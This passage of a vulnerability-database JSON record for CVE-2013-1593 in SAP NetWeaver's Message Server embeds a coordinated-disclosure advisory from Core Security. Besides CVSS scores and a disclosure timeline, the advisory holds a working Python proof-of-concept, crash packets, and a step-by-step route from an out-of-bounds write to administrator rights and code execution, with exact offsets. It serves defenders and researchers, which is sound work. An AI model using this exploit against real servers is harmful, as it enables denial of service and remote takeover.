"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2013-1593",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "ZDI-12-112",
"impactScore": 8.5,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "ZDI-12-111",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "ZDI-12-104",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "29348194-1f62-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2013-1593",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-1593",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "ZDI-12-112",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "ZDI-12-111",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "ZDI-12-104",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
},
{
"author": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2013-1593",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "VULMON",
"id": "CVE-2013-1593"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007128"
},
{
"db": "NVD",
"id": "CVE-2013-1593"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN. SAP NetWeaver Contains an array index validation vulnerability.Denial of service operation (DoS) May be in a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \\x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. \nSuccessfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. \nThe following products are affected:\nSAP Netweaver 2004s\nSAP Netweaver 7.01 SR1\nSAP Netweaver 7.02 SP06\nSAP Netweaver 7.30 SP04. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nCORE-2012-1128\n\n\n1. *Advisory Information*\n\nTitle: SAP Netweaver Message Server Multiple Vulnerabilities\nAdvisory ID: CORE-2012-1128\nAdvisory URL:\nhttp://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities\nDate published: 2013-02-13\nDate of last update: 2013-02-13\nVendors contacted: SAP\nRelease mode: Coordinated release\n\n\n\n2. *Vulnerability Information*\n\nClass: Improper Validation of Array Index [CWE-129], Buffer overflow\n[CWE-119]\nImpact: Code execution, Denial of service\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2013-1592, CVE-2013-1593\n\n\n\n3. By sending different messages,\nthe different vulnerabilities can be triggered. \n\n\n4. *Vulnerable packages*\n\n . Older versions are probably affected too, but they were not checked. \n\n5. *Non-vulnerable packages*\n\n . Vendor did not provide this information. \n\n6. *Vendor Information, Solutions and Workarounds*\n\nSAP released the security note 1800603 [2] regarding these issues. \n\n\n7. *Credits*\n\nVulnerability [CVE-2013-1592] was discovered by Martin Gallo and\nFrancisco Falcon, and additional research was performed by Francisco\nFalcon. Vulnerability [CVE-2013-1593] was discovered and researched by\nMartin Gallo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Fernando Miranda from Core Advisories\nTeam. \n\n\n8. *Technical Description / Proof of Concept Code*\n\nThe following python script is the main PoC that can be used to\nreproduce all vulnerabilities described below:\n\n/-----\nimport socket, struct\nfrom optparse import OptionParser\n\n# Parse the target options\nparser = OptionParser()\nparser.add_option(\"-d\", \"--hostname\", dest=\"hostname\", help=\"Hostname\",\ndefault=\"localhost\")\nparser.add_option(\"-p\", \"--port\", dest=\"port\", type=\"int\", help=\"Port\nnumber\", default=3900)\n(options, args) = parser.parse_args()\n\nclient_string = \u0027-\u0027+\u0027 \u0027*39\nserver_name = \u0027-\u0027+\u0027 \u0027*39\n\ndef send_packet(sock, packet):\n packet = struct.pack(\"!I\", len(packet)) + packet\n sock.send(packet)\n\ndef receive(sock):\n length = sock.recv(4)\n (length, ) = struct.unpack(\"!I\", length)\n data = \"\"\n while len(data)\u003clength:\n data+= sock.recv(length)\n return (length, data)\n\ndef initialize_connection(hostname, port):\n\n # Connect\n print \"[*] Connecting to\", hostname, \"port\", port\n connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n connection.connect((hostname, port))\n\n # Send initialization packet\n print \"[*] Conected, sending login request\"\n\n init = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n init+= \u0027\\x04\u0027 # version\n init+= \u0027\\x00\u0027 # errorno\n init+= client_string # toname\n init+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n init+= \u0027\\x01\\x08\u0027 # flag / iflag (MS_LOGIN_2)\n init+= client_string # fromname\n init+= \u0027\\x00\\x00\u0027 # padd\n send_packet(connection, init)\n\n # Receive response\n print \"[*] Receiving login reply\"\n (length, data) = receive(connection)\n\n # Parsing login reply\n server_name = data[4+64:4+64+40]\n\n return connection\n\n# Main PoC body\nconnection = initialize_connection(options.hostname, options.port)\nsend_attack(connection)\n\n-----/\n\n\nIn the following subsections, we give the python code that can be added\nafter the script above in order to reproduce all vulnerabilities. \n\n\n8.1. Malicious\npackets are processed by the vulnerable function \u0027_MsJ2EE_AddStatistics\u0027\nin the \u0027msg_server.exe\u0027 module. \n\nThe vulnerable function \u0027_MsJ2EE_AddStatistics\u0027 receives a pointer to a\n\u0027MSJ2EE_HEADER\u0027 struct as its third parameter, which is fully controlled\nby the attacker. This struct type is defined as follows:\n\n/-----\n00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type)\n00000000 senderclusterid dd ?\n00000004 clusterid dd ?\n00000008 serviceid dd ?\n0000000C groupid dd ?\n00000010 nodetype db ?\n00000011 db ? ; undefined\n00000012 db ? ; undefined\n00000013 db ? ; undefined\n00000014 totallength dd ?\n00000018 currentlength dd ?\n0000001C currentoffset dd ?\n00000020 totalblocks db ?\n00000021 currentblock db ?\n00000021\n00000022 db ? ; undefined\n00000023 db ? ; undefined\n00000024 messagetype dd ?\n00000028 MSJ2EE_HEADER ends\n-----/\n The \u0027_MsJ2EE_AddStatistics\u0027 function uses the \u0027serviceid\u0027 field of the\n\u0027MSJ2EE_HEADER\u0027 to calculate an index to write into the\n\u0027j2ee_stat_services\u0027 global array, without properly validating that the\nindex is within the boundaries of the array. On the other hand,\n\u0027j2ee_stat_services\u0027 is a global array of 256 elements of type\n\u0027MSJ2EE_STAT_ELEMENT\u0027:\n\n/-----\n.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]\n.data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(\u003c?\u003e)\n.data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o\n.data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... \n\n-----/\n This vulnerability can be used to corrupt arbitrary memory with\narbitrary values, with some restrictions. The following snippet shows\nthe vulnerable code within the \u0027_MsJ2EE_AddStatistics\u0027 function:\n\n/-----\nmov edi, [ebp+pJ2eeHeader]\nmov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker\ncontrols MSJ2EE_HEADER.serviceid\nxor ecx, ecx\ncmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx\nlea esi, [eax+eax*8]\nlea esi, j2ee_stat_services.totalMsgCount[esi*8] ;using the index\nwithout validating array bounds\n\n-----/\n Since the \u0027serviceid\u0027 value is first multiplied by 9 and then it is\nmultiplied by 8, the granularity of the memory addresses that can be\ntargeted for memory corruption is 0x48 bytes, which is the size of the\n\u0027MSJ2EE_STAT_ELEMENT\u0027 struct:\n\n/-----\n00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type)\n00000000 ; XREF:\n.data:j2ee_stat_totalr\n00000000 ; .data:j2ee_stat_servicesr\n00000000 totalMsgCount dq ? ; XREF:\n_MsJ2EE_AddStatistics+1Br\n00000000 ;\n_MsJ2EE_AddStatistics+2Fr ... \n00000008 totalMsgLength dq ? ; XREF:\n_MsJ2EE_AddStatistics+192r\n00000008 ;\n_MsJ2EE_AddStatistics+19Br ... \n00000010 avgMsgLength dq ? ; XREF:\n_MsJ2EE_AddStatistics+1C2w\n00000010 ;\n_MsJ2EE_AddStatistics+1C7w ... \n00000018 maxLength dq ? ; XREF:\n_MsJ2EE_AddStatistics+161r\n00000018 ;\n_MsJ2EE_AddStatistics+16Er ... \n00000020 noP2PMessage dq ? ; XREF:\n_MsJ2EE_AddStatistics:loc_44D442w\n00000020 ;\n_MsJ2EE_AddStatistics+158w ... \n00000028 noP2PRequest dq ? ; XREF:\n_MsJ2EE_AddStatistics+144w\n00000028 ;\n_MsJ2EE_AddStatistics+14Aw ... \n00000030 noP2PReply dq ? ; XREF:\n_MsJ2EE_AddStatistics+132w\n00000030 ;\n_MsJ2EE_AddStatistics+138w ... \n00000038 noBroadcastMessage dq ? ; XREF:\n_MsJ2EE_AddStatistics:loc_44D40Dw\n00000038 ;\n_MsJ2EE_AddStatistics+123w ... \n00000040 noBroadcastRequest dq ? ; XREF:\n_MsJ2EE_AddStatistics+10Fw\n00000040 ;\n_MsJ2EE_AddStatistics+115w ... \n00000048 MSJ2EE_STAT_ELEMENT ends\n\n-----/\n However, it is possible to use different combinations of the\n\u0027flag/iflag\u0027 values in the Message Server packet to gain more precision\nover the memory addresses that can be corrupted. Different combinations\nof \u0027flag/iflag\u0027 values provide different memory corruption primitives,\nas shown below:\n\n/-----\nAt this point:\n * ESI points to an arbitrary, attacker-controlled memory address\n * EBX == 1\n\n.text:0044D359 movzx eax, [ebp+msiflag]\n.text:0044D35D sub eax, 0Ch\n.text:0044D360 jz short loc_44D37C\n.text:0044D362 sub eax, ebx\n.text:0044D364 jnz short loc_44D39D\n.text:0044D366 cmp [ebp+msflag], 2\n.text:0044D36A jnz short loc_44D374\n.text:0044D36C add [esi+40h], ebx ; iflag=0xd,\nflag=2 =\u003e add 1 to [esi+0x40]\n.text:0044D36F adc [esi+44h], ecx\n.text:0044D372 jmp short loc_44D39D\n.text:0044D374 ;\n---------------------------------------------------------------------------\n.text:0044D374\n.text:0044D374 loc_44D374: ; CODE XREF:\n_MsJ2EE_AddStatistics+7Aj\n.text:0044D374 add [esi+38h], ebx ; iflag=0xd,\nflag=1 =\u003e add 1 to [esi+0x38]\n.text:0044D377 adc [esi+3Ch], ecx\n.text:0044D37A jmp short loc_44D39D\n.text:0044D37C ;\n---------------------------------------------------------------------------\n.text:0044D37C\n.text:0044D37C loc_44D37C: ; CODE XREF:\n_MsJ2EE_AddStatistics+70j\n.text:0044D37C mov al, [ebp+msflag]\n.text:0044D37F cmp al, 3\n.text:0044D381 jnz short loc_44D38B\n.text:0044D383 add [esi+30h], ebx ; iflag=0xc,\nflag=3 =\u003e add 1 to [esi+0x30]\n.text:0044D386 adc [esi+34h], ecx\n.text:0044D389 jmp short loc_44D39D\n.text:0044D38B ;\n---------------------------------------------------------------------------\n.text:0044D38B\n.text:0044D38B loc_44D38B: ; CODE XREF:\n_MsJ2EE_AddStatistics+91j\n.text:0044D38B cmp al, 2\n.text:0044D38D jnz short loc_44D397\n.text:0044D38F add [esi+28h], ebx ; iflag=0xc,\nflag=2 =\u003e add 1 to [esi+0x28]\n.text:0044D392 adc [esi+2Ch], ecx\n.text:0044D395 jmp short loc_44D39D\n.text:0044D397 ;\n---------------------------------------------------------------------------\n.text:0044D397\n.text:0044D397 loc_44D397: ; CODE XREF:\n_MsJ2EE_AddStatistics+9Dj\n.text:0044D397 add [esi+20h], ebx ; iflag=0xc,\nflag=1 =\u003e add 1 to [esi+0x20]\n.text:0044D39A adc [esi+24h], ecx\n\n[...]\n\n-----/\n And the following code excerpt is always executed within the\n\u0027_MsJ2EE_AddStatistics\u0027 function, providing two more memory corruption\nprimitives:\n\n/-----\n.text:0044D3B7 add [esi],\nebx ;add 1 to [esi]\n.text:0044D3B9 adc dword ptr [esi+4], 0\n.text:0044D3BD mov eax,\n[edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully\ncontrolled by the attacker\n.text:0044D3C0 cdq\n.text:0044D3C1 add [esi+8],\neax ;add an arbitrary number to [esi+8]\n\n-----/\n This memory corruption vulnerability can be used by remote\nunauthenticated attackers to execute arbitrary code on vulnerable\ninstallations of SAP Netweaver, but it can also be abused to modify the\ninternal state of the vulnerable service in order to gain administrative\nprivileges within the SAP Netweaver Message Server. \n\nA client connected to the Message Server may have administrative\nprivileges or not. The Message Server holds a structure of type\n\u0027MSADM_s\u0027 for each connected client, which contains information about\nthat very connection. Relevant parts of the \u0027MSADM_s\u0027 struct type are\nshown below:\n\n/-----\n00000000 MSADM_s struc ; (sizeof=0x538, standard type)\n00000000 ; XREF: .data:dummy_clientr\n00000000 client_type dd ? ; enum MS_CLIENT_TYPE\n00000004 stat dd ? ; enum MS_STAT\n00000008 connection_ID dd ?\n0000000C status db ?\n0000000D dom db ? ; XREF: MsSFillCon+3Cw\n0000000E admin_allowed db ?\n0000000F db ? ; undefined\n00000010 name dw 40 dup(?)\n[...]\n00000534 _padding db 4 dup(?)\n00000538 MSADM_s ends\n\n-----/\n The \u0027admin_allowed\u0027 field at offset 0x0E is a boolean value that\nindicates whether the connected client has administrative privileges or\nnot. When a new client connects, the \u0027MsSLoginClient\u0027 function of the\nMessage Server sets the proper value for the \u0027admin_allowed\u0027 field in\nthe \u0027MSADM_s\u0027 struct instance associated with that client:\n\n/-----\n.text:004230DC\nloc_4230DC: ; CODE\nXREF: MsSLoginClient+AAAj\n.text:004230DC\n ; MsSLoginClient+B26j\n.text:004230DC cmp byte ptr [edi+0Eh],\n0 ; privileged client?\n.text:004230E0 jnz short\nloc_4230EA ; if yes, jump\n.text:004230E2 mov al, byte ptr\nms_admin_allowed ; otherwise, grab the value of the\n\"ms_admin_allowed\" global variable... \n.text:004230E7 mov [edi+0Eh],\nal ; ...and save it to MSADM_s.admin_allowed\n\n-----/\n So if we manage to overwrite the value of the \u0027ms_admin_allowed\u0027 global\nvariable with a value different than 0, then we can grant administrative\nprivileges to our unprivileged connections. In SAP Netweaver\n\u0027msg_server.exe\u0027 v7200.70.18.23869, the \u0027ms_admin_allowed\u0027 global\nvariable is located at \u00270x008f17f0\u0027:\n\n/-----\n.data:008F17F0 ; int ms_admin_allowed\n.data:008F17F0 ms_admin_allowed dd ? ; DATA XREF:\nMsSSetMonitor+7Ew\n.data:008F17F0 ; MsSLoginClient+B62r\n\n-----/\n And the \u0027j2ee_stat_services\u0027 global array, which is the array that can\nbe indexed outside its bounds, is located at \u00270x0090b9e0\u0027:\n\n/-----\n.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]\n.data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(\u003c?\u003e)\n.data:0090B9E0 ; DATA XREF:\n_MsJ2EE_AddStatistics+24o\n.data:0090B9E0 ;\n_MsJ2EE_AddStatistics+4Co ... \n\n-----/\n So, by providing \u0027MSJ2EE_HEADER.serviceid == 0x038E3315\u0027, we will be\ntargeting \u00270x008F17C8\u0027 as the base address for memory corruption. Having\nin mind the different memory corruption primitives based on combinations\nof \u0027flag/iflag\u0027 fields described above, by specifying \u0027iflag == 0xC\u0027 and\n\u0027flag == 0x2\u0027 in our Message Server packet we will be able to add 1 to\n\u0027[0x008F17C8+0x28]\u0027, effectively overwriting the contents of\n\u00270x008F17F0\u0027 (\u0027ms_admin_allowed\u0027). After overwriting \u0027ms_admin_allowed\u0027,\nall of our future connections will have administrative privileges within\nthe Message Server. \n\nAfter gaining administrative privileges for our future connections,\nthere are at least two possible paths of exploitation:\n\n 1. Of\ncourse it is not mandatory to have administrative privileges in order to\noverwrite function pointers, but considering the limitation of\ntargetable addresses imposed by the little granularity of the memory\ncorruption, some of the most handy-to-exploit function pointers happened\nto be accessible just for administrative connections. \n 2. Modify the configuration and behavior of the server. That includes\nchanging Message Server\u0027s runtime parameters and enabling Monitor Mode\nin the affected server. \n\n8.1.1. *Gaining remote code execution by overwriting function pointers*\n\nHaving in mind that the granularity of the memory addresses that can be\ntargeted for memory corruption is not that flexible (0x48 bytes) and the\nlimited memory corruption primitives available, it takes some effort to\nfind a function pointer that can be overwritten with a useful value and\nwhich can be later triggered with a network packet. \n\nOne possibility is to overwrite one of the function pointers which are\nin charge of handling the modification of Message Server parameters:\n\n/-----\n.data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58]\n\n; function pointers associated to the modification of the \"ms/max_sleep\"\nparameter\n.data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER\n\u003coffset aMsMax_sleep, \\\n.data:0087DED0 offset\nMsSTestInteger, \\ ; \"rdisp/TRACE_PATTERN_2\"\n.data:0087DED0 offset\nMsSSetMaxSleep\u003e\n\n; function pointers associated to the modification of the \"ms/max_vhost\"\nparameter\n.data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER \u003coffset\naMsMax_vhost, \\\n.data:0087DED0 offset\nMsSTestInteger, \\ ;\u003c-- we can overwrite this one\n.data:0087DED0 offset\nMsSSetMaxVirtHost\u003e\n\n[...]\n\n-----/\n By providing \u0027MSJ2EE_HEADER.serviceid == 0x038E1967\u0027 we can target\n\u00270x0087DED8\u0027 as the base address for memory corruption. In this case we\ncan use the memory corruption primitive at address \u00270x0044D3C1\u0027 that\nalways gets executed, which will allow us to add an arbitrary number\n(the value of \u0027MSJ2EE_HEADER.totallength\u0027) to \u0027[0x0087DED8+8]\u0027\neffectively overwriting the function pointer shown above\n(\u0027ms_changeable_parameter[1].set\u0027). \n\nAfter that we need to send a \u0027MS_SET_PROPERTY\u0027 request, specifying\n\u0027ms/max_vhost\u0027 as the name of the property to be changed. This\n\u0027MS_SET_PROPERTY\u0027 packet will make our overwritten function pointer to\nbe called from the \u0027MsSChangeParam\u0027 function:\n\n/-----\n.text:00404DB3 loc_404DB3: ; CODE XREF:\nMsSChangeParam+CDj\n.text:00404DB3 lea esi, [edi+edi*2]\n.text:00404DB6 mov edi, [ebp+pvalue]\n.text:00404DB9 add esi, esi\n.text:00404DBB mov edx,\nms_changeable_parameter.test[esi+esi]\n.text:00404DC2 add esi, esi\n.text:00404DC4 push edi\n.text:00404DC5 push pname\n.text:00404DC6 call edx ; call our\noverwritten function pointer\n\n-----/\n\u0027MS_SET_PROPERTY\u0027 packets will be ignored by the Message Server if the\nrequesting client does not have administrative privileges, so it is\nnecessary to gain administrative privileges as explained above before\nusing the memory corruption vulnerability to overwrite one of the\nfunction pointers in the \u0027ms_changeable_parameter\u0027 global array. \n\n\n8.1.2. *Modify the configuration and behavior of the server*\n\nAfter gaining administrative privileges for our connections, it is\npossible to perform \u0027MS_SET_PROPERTY\u0027 packets against the Message Server\nin order to modify its configuration and behavior. That makes possible,\nfor example, to add virtual hosts to the load balancer, or to enable\nMonitor Mode [3] (transaction SMMS) on the affected server. Enabling\nMonitor Mode takes two steps:\n\n 1. Send a \u0027MS_SET_PROPERTY\u0027 packet with property \u0027name ==\n\"ms/monitor\"\u0027, property \u0027value == 1\u0027. \n 2. Send a \u0027MS_SET_PROPERTY\u0027 packet with property \u0027name ==\n\"ms/admin_port\"\u0027, property \u0027value == 3535\u0027 (or any other arbitrary port\nnumber). \n\nThe following python code can be used to trigger the vulnerability:\n\n/-----\ndef send_attack(connection):\n print \"[*] Sending crash packet\"\n crash = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n crash+= \u0027\\x04\u0027 # version\n crash+= \u0027\\x00\u0027 # errorno\n crash+= server_name # toname\n crash+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n crash+= \u0027\\x04\\x0d\u0027 # flag/iflag\n crash+= client_string # fromname\n crash+= \u0027\\x00\\x00\u0027 # padd\n\n crash+=\n\"ABCDEFGH\"+\"\\x01\\x00\\x00\\x00\"+\"MNOPQRSTUVWXYZ0123\"+\"\\x01\"+\"56789abcd\"\n crash+= \"\\x00\\x00\\x00\\x01\"\n crash+= \"\\xff\\xff\\xff\\xff\"\n crash+= \"\\x00\\x00\\x00\\x00\"\n send_packet(connection, crash)\n\n print \"[*] Crash sent !\"\n-----/\n\n\n\n8.2. \nMalicious packets are processed by the vulnerable function \u0027WRITE_C\u0027 in\nthe \u0027msg_server.exe\u0027 module. \n\nThe following python code can be used to trigger the vulnerability:\n\n/-----\ndef send_attack(connection):\n print \"[*] Sending crash packet\"\n crash = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n crash+= \u0027\\x04\u0027 # version\n crash+= \u0027\\x00\u0027 # errorno\n crash+= server_name # toname\n crash+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n crash+= \u0027\\x04\\x05\u0027 # flag/iflag\n crash+= client_string # fromname\n crash+= \u0027\\x00\\x00\u0027 # padd\n\n crash+= \"AD-EYECATCH\\x00\"\n crash+= \"\\x01\\x01\"\n crash+= \"%11d\" % 104\n crash+= \"%11d\" % 1\n crash+= \"\\x15\\x00\\x00\\x00\"\n crash+= \"\\x20\\x00\\x00\\xc8\"\n crash+= \"LALA\" + \u0027 \u0027*(20-4)\n crash+= \"LOLO\" + \u0027 \u0027*(40-4)\n crash+= \" \"*36\n send_packet(connection, crash)\n\n print \"[*] Crash sent !\"\n\n-----/\n\n\n\n9. *Report Timeline*\n. 2012-12-10:\nCore Security Technologies notifies the SAP team of the vulnerability,\nsetting the estimated publication date of the advisory for January 22nd,\n2013. 2012-12-10:\nCore sends an advisory draft with technical details and a PoC. 2012-12-11:\nThe SAP team confirms the reception of the issue. 2012-12-21:\nSAP notifies that they concluded the analysis of the reported issues and\nconfirms two out of the five vulnerabilities. Vendor also notifies that\nthe other three reported issues were already fixed in February, 2012. \nVendor also notifies that the necessary code changes are being done and\nextensive tests will follow. The corresponding security note and patches\nare planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21:\nCore re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28:\nSAP notifies Core that they will be contacted if tests fails in order to\nre-schedule the advisory publication. 2013-01-22:\nFirst release date missed. 2013-01-28:\nSAP notifies that they are still confident with releasing a security\nnote and patches on Feb 12th as planned. 2013-01-29:\nCore acknowledges receiving the information and notifies that everything\nis ready for public disclosing on Feb 12th. Core also asks additional\ninformation regarding the patched vulnerabilities mentioned in\n[2012-12-21], including links to security bulletin, CVEs, and patches in\norder to verify if those patches effectively fix the reported flaws. 2013-02-01:\nSAP notifies that the patched vulnerabilities mentioned in [2012-12-21]\nwere reported in [5] and no CVE were assigned to them. Those\nvulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06:\nCore notifies that the patched vulnerabilities will be removed from the\nadvisory and asks additional information regarding the affected and\npatched version numbers. 2013-02-01:\nSAP notifies that the security note 1800603 will be released and that\nnote will provide further information regarting this vulnerability. 2013-02-13:\nAdvisory CORE-2012-1128 published. \n\n\n10. *References*\n\n[1] http://www.sap.com/platform/netweaver/index.epx. \n[2] SAP Security note Feb 2013\nhttps://service.sap.com/sap/support/notes/1800603. \n[3]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. \n\n[4]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. \n\n[5] SAP Security notes Feb 2012\nhttps//service.sap.com/sap/support/notes/1649840. \n[6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. \n[7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. \n[8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. \n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company\u0027s Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2012 Core Security\nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial 